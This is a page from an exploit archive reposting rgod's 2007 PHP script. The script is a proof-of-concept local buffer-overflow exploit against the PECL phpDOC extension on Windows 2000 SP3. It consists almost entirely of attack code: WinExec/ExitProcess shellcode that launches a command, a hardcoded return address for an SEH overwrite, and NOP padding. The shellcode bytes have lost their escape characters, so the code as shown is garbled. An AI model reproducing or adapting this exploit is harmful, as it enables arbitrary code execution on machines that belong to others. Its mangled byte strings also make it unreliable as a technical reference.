PHP 5.2.1 with PECL phpDOC Local Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP 5.2.1 with PECL phpDOC Local Buffer Overflow Exploit
# Published : 2007-03-25
# Author : rgod
# Previous Title : Mac OS X 10.4.8 DiskManagement BOM Local Privilege Escalation Exploit
# Next Title : PHP 5.2.1 unserialize() Local Information Leak Exploit

<?php
//PHP 5.2.1 with PECL phpDOC confirm_phpdoc_compiled() local buffer overflow poc exploit
//WIN 2K SP3 version / seh overwrite method
//to be launched from the cli

// by rgod
// site: http://retrogod.altervista.org

if (!extension_loaded("phpDOC")){
die("you need the phpDOC extension loaded.");
}


$____scode=
"xebx1b".
"x5b".
"x31xc0".
"x50".
"x31xc0".
"x88x43x59".
"x53".
"xbbxcax73xe9x77". //WinExec
"xffxd3".
"x31xc0".
"x50".
"xbbx5cxcfxe9x77". //ExitProcess
"xffxd3".
"xe8xe0xffxffxff".
"x63x6dx64".
"x2e".
"x65".
"x78x65".
"x20x2f".
"x63x20".
"start notepad & ";

//eip & ecx set to the same value ...
$eip="x47x30xE9x77";//0x77E93047      pop ECX - pop - retbis kernel32.dll
//and further (junk...) inc edi, xor cl ch, *ja short* 
//should work on sp4 if you find an usable address
$____suntzu=str_repeat("x90",1393 - strlen($____scode)).$____scode.str_repeat("x90",30).$eip.str_repeat("x90",12);
confirm_phpdoc_compiled($____suntzu);

?>

# www.Syue.com [2007-03-25]